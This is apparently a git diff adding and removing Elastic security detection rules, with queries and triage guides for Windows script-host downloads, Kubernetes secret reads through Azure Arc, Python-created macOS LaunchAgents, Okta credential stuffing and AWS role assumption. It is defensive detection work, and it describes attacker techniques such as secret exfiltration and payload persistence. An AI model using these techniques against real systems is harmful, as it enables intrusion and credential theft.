"1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json new file mode 100644 index 00000000000..14f13a665ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.network-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\"exe\", \"dll\", \"bat\", \"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"scr\", \"pif\", \"com\", \"cpl\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 214 + }, + "id": "1d276579-3380-4095-ad38-e596a01bc64f_214", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json b/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json new file mode 100644 index 00000000000..6ff380f951d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json @@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs.", + "false_positives": [ + "Azure Arc system components may create or update secrets and configmaps in the azure-arc and azure-arc-release namespaces during normal cluster management. Filter by namespace to exclude these.", + "Helm operations managed through Arc may create release secrets (prefixed with sh.helm.release.v1). These are normal Arc lifecycle operations." + ], + "from": "now-5d", + "interval": "9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Kubernetes Secret or ConfigMap Access via Azure Arc Proxy", + "note": "## Triage and analysis\n\n### Investigating Kubernetes Secret or ConfigMap Access via Azure Arc Proxy\n\nWhen Kubernetes operations are performed through Azure Arc Cluster Connect, the K8s audit log shows the Arc AAD proxy\nservice account as the authenticated user, with the actual Azure AD identity in the `impersonatedUser` field. This\nrule detects non-system secret and configmap access \u2014 including reads, writes, and deletions \u2014 routed through this\nproxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common\nadversary action: exfiltrating secrets without leaving obvious modification traces.\n\n### Possible investigation steps\n\n- Check the `kubernetes.audit.impersonatedUser.username` field \u2014 this contains the Azure AD object ID of the actual\n caller. Cross-reference with Azure AD to identify the service principal or user.\n- Review the `kubernetes.audit.impersonatedUser.extra.oid` field for the Azure AD object ID.\n- Examine the namespace \u2014 operations in `default` or application namespaces are more suspicious than `azure-arc` or\n `kube-system`.\n- Check the `kubernetes.audit.objectRef.name` \u2014 look for suspicious secret/configmap names that don't match known\n application resources.\n- Correlate with Azure Activity Logs for the same time window to find the `LISTCLUSTERUSERCREDENTIAL` operation that\n initiated the Arc proxy session.\n- Review Azure Sign-In Logs for the impersonated identity's authentication source IP and geolocation.\n\n### Response and remediation\n\n- If the impersonated identity is not recognized, revoke its Azure AD credentials immediately.\n- Remove the ClusterRoleBinding or RoleBinding that grants the identity access to secrets/configmaps.\n- Rotate any Kubernetes secrets that may have been read or exfiltrated.\n- Review the Arc connection and consider disconnecting it if compromised.\n", + "query": "FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index\n| WHERE STARTS_WITH(kubernetes.audit.user.username, \"system:serviceaccount:azure-arc:\")\n AND kubernetes.audit.objectRef.resource IN (\"secrets\", \"configmaps\")\n AND kubernetes.audit.verb IN (\"get\", \"list\", \"create\", \"update\", \"patch\", \"delete\")\n AND kubernetes.audit.objectRef.namespace NOT IN (\"azure-arc\", \"azure-arc-release\", \"kube-system\")\n AND NOT STARTS_WITH(kubernetes.audit.objectRef.name, \"sh.helm.release.v1\")\n\n| STATS\n Esql.verb_values = VALUES(kubernetes.audit.verb),\n Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource),\n Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name),\n Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace),\n Esql.acting_user_values = VALUES(kubernetes.audit.user.username),\n Esql.user_agent_values = VALUES(kubernetes.audit.userAgent),\n Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs),\n Esql.response_code_values = VALUES(kubernetes.audit.responseStatus.code),\n Esql.timestamp_first_seen = MIN(@timestamp),\n Esql.timestamp_last_seen = MAX(@timestamp),\n Esql.event_count = COUNT(*)\n BY kubernetes.audit.impersonatedUser.username\n\n| WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes\n| KEEP *\n", + "references": [ + "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect", + "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/", + "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence", + "https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services", + "https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.acting_user_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.resource_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.resource_type_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.response_code_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.source_ips_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.timestamp_first_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.timestamp_last_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_agent_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.verb_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.impersonatedUser.username", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "220d92c6-479d-4a49-9cc0-3a29756dad0c", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.007", + "name": "Container API", + "reference": "https://attack.mitre.org/techniques/T1552/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1530", + "name": "Data from Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1530/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "220d92c6-479d-4a49-9cc0-3a29756dad0c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json deleted file mode 100644 index 9bd34a30522..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "High Number of Okta Device Token Cookies Generated for Authentication", - "note": "## Triage and analysis\n\n### Investigating High Number of Okta Device Token Cookies Generated for Authentication\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "from logs-okta*\n| where\n event.dataset == \"okta.system\" and\n (event.action like \"user.authentication.*\" or event.action == \"user.session.start\") and\n okta.debug_context.debug_data.request_uri == \"/api/v1/authn\" and\n okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| keep\n event.action,\n okta.debug_context.debug_data.dt_hash,\n okta.client.ip,\n okta.actor.alternate_id,\n okta.debug_context.debug_data.request_uri,\n okta.outcome.reason\n| stats\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash)\n by\n okta.client.ip,\n okta.actor.alternate_id\n| where\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 30\n| sort\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.0.0" - } - ], - "risk_score": 21, - "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 207 - }, - "id": "23f18264-2d6d-11ef-9413-f661ea17fbce_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json b/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json new file mode 100644 index 00000000000..adb9b03fbfb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.persistence-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Python Created a LaunchAgent or LaunchDaemon", + "new_terms_fields": [ + "host.id", + "file.path" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Python Created a LaunchAgent or LaunchDaemon\n\nmacOS LaunchAgents and LaunchDaemons are plist files that configure programs to run automatically at login or boot. Attackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 can drop plist files to establish persistence on the compromised host. This ensures their payload survives reboots and user logouts.\n\nThis rule uses the Elastic Defend persistence event type (`event.action:\"launch_daemon\"`), which captures plist metadata including the program arguments, run-at-load configuration, and keep-alive settings. The New Terms rule type alerts on the first time a Python process creates a LaunchAgent or LaunchDaemon on a given host within a 7-day window.\n\n### Possible investigation steps\n\n- Review the persistence event fields (`Persistence.runatload`, `Persistence.keepalive`, `Persistence.args`, `Persistence.path`) to understand the plist configuration.\n- Examine the program path and arguments specified in the plist to determine if they reference a known legitimate application or a suspicious binary.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Verify if the target binary referenced in the plist exists on disk and whether it is signed or trusted.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Check for other persistence mechanisms that may have been established around the same time.\n\n### False positive analysis\n\n- Some Python-based system management tools (e.g., Ansible, SaltStack) may legitimately create LaunchAgent or LaunchDaemon plist files. Evaluate whether the activity matches a known automation workflow.\n- Python-based application installers may create plist files during setup. Check if the activity correlates with a known software installation.\n\n### Response and remediation\n\n- Immediately unload the suspicious LaunchAgent or LaunchDaemon using `launchctl unload` with the plist path.\n- Remove the suspicious plist file and any associated binary it references.\n- Kill any processes launched by the plist file.\n- Investigate and quarantine the Python script, package, or model file that created the persistence mechanism.\n- Scan the host for additional indicators of compromise.\n- If a malicious file is confirmed, identify all hosts where it may have been distributed.\n", + "query": "host.os.type:macos and event.action:\"launch_daemon\" and\nprocess.name:python*\n", + "references": [ + "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/", + "https://github.com/trailofbits/fickling" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "25368123-b7b8-4344-9fd4-df28051b4c6e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "25368123-b7b8-4344-9fd4-df28051b4c6e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json deleted file mode 100644 index 3c0e1df6c2d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/288a198e-9b9b-11ef-a0a8-f661ea17fbcd_4.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a user or role has assumed a role in AWS Security Token Service (STS). Users can assume a role to obtain temporary credentials and access AWS resources. Adversaries can use this technique for credential access and privilege escalation. This is a [New Terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule that identifies when a service assumes a role in AWS Security Token Service (STS) to obtain temporary credentials and access AWS resources. While often legitimate, adversaries may use this technique for unauthorized access, privilege escalation, or lateral movement within an AWS environment.", - "false_positives": [ - "AWS administrators or automated processes might regularly assume roles for legitimate administrative purposes.", - "Applications integrated with AWS might assume roles to access AWS resources.", - "Automated workflows might assume roles to perform periodic tasks such as data backups, updates, or deployments." - ], - "history_window_start": "now-10d", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "investigation_fields": { - "field_names": [ - "@timestamp", - "user.name", - "user_agent.original", - "source.address", - "aws.cloudtrail.user_identity.arn", - "aws.cloudtrail.user_identity.type", - "aws.cloudtrail.resources.arn", - "aws.cloudtrail.resources.type", - "aws.cloudtrail.flattened.request_parameters.roleArn", - "aws.cloudtrail.flattened.request_parameters.roleSessionName", - "event.action", - "event.outcome", - "cloud.region", - "aws.cloudtrail.request_parameters", - "aws.cloudtrail.response_elements" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS STS Role Assumption by User", - "new_terms_fields": [ - "user.name", - "aws.cloudtrail.flattened.request_parameters.roleArn" - ], - "note": "## Triage and analysis\n\n### Investigating AWS STS Role Assumption by User\n\nThis rule detects when a user assumes a role in AWS Security Token Service (STS), receiving temporary credentials to access AWS resources. While often used for legitimate purposes, this action can be leveraged by adversaries to obtain unauthorized access, escalate privileges, or move laterally within an AWS environment.\n\n#### Possible Investigation Steps\n\n- **Identify the User and Assumed Role**:\n - **User Identity**: Check `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type` for details about the initiator of the `AssumeRole` action.\n - **Role Assumed**: Review `aws.cloudtrail.flattened.request_parameters.roleArn` to confirm the role assumed and ensure it aligns with the user\u2019s standard permissions.\n - **Session Name**: Note `aws.cloudtrail.flattened.request_parameters.roleSessionName` for context on the purpose of the session.\n\n- **Evaluate Session Context and Credential Duration**:\n - **Session Details**: Look into `aws.cloudtrail.user_identity.session_context.creation_date` for the start of the session and `aws.cloudtrail.user_identity.session_context.mfa_authenticated` to check for MFA usage.\n - **Credential Validity**: Examine `aws.cloudtrail.flattened.request_parameters.durationSeconds` for how long the credentials are valid.\n - **Expiration Time**: Use `aws.cloudtrail.flattened.response_elements.credentials.expiration` to confirm the credential expiration.\n\n- **Inspect User Agent and Source Information**:\n - **User Agent**: Analyze the `user_agent.original` field to identify if specific tooling or SDKs like AWS CLI, Boto3, or custom agents were used.\n - **Source IP and Geolocation**: Examine `source.address` and `source.geo` fields to determine the origin of the request, confirming if it aligns with expected locations.\n\n- **Correlate with Related Events**:\n - **Identify Patterns**: Review related CloudTrail events for unusual access patterns, such as resource access or sensitive actions following this `AssumeRole` action.\n - **Filter High-Volume Roles**: If this role or user has a high volume of access, evaluate `roleArn` or `user_agent` values for common patterns and add trusted entities as exceptions.\n\n- **Review the Privileges of the Assumed Role**:\n - **Permissions**: Examine permissions associated with the `roleArn` to assess its access scope.\n - **Authorized Usage**: Confirm if the role is used frequently for administrative purposes and if this aligns with the user\u2019s regular responsibilities.\n\n### False Positive Analysis\n\n- **Automated Processes and Applications**: Applications or scheduled tasks may assume roles regularly for operational purposes. Validate the consistency of the `user_agent` or `roleArn` with known automated workflows.\n- **Standard IAM Policy Usage**: Confirm if the user or application routinely assumes this specific role for normal operations by reviewing historical activity.\n\n### Response and Remediation\n\n- **Terminate Unauthorized 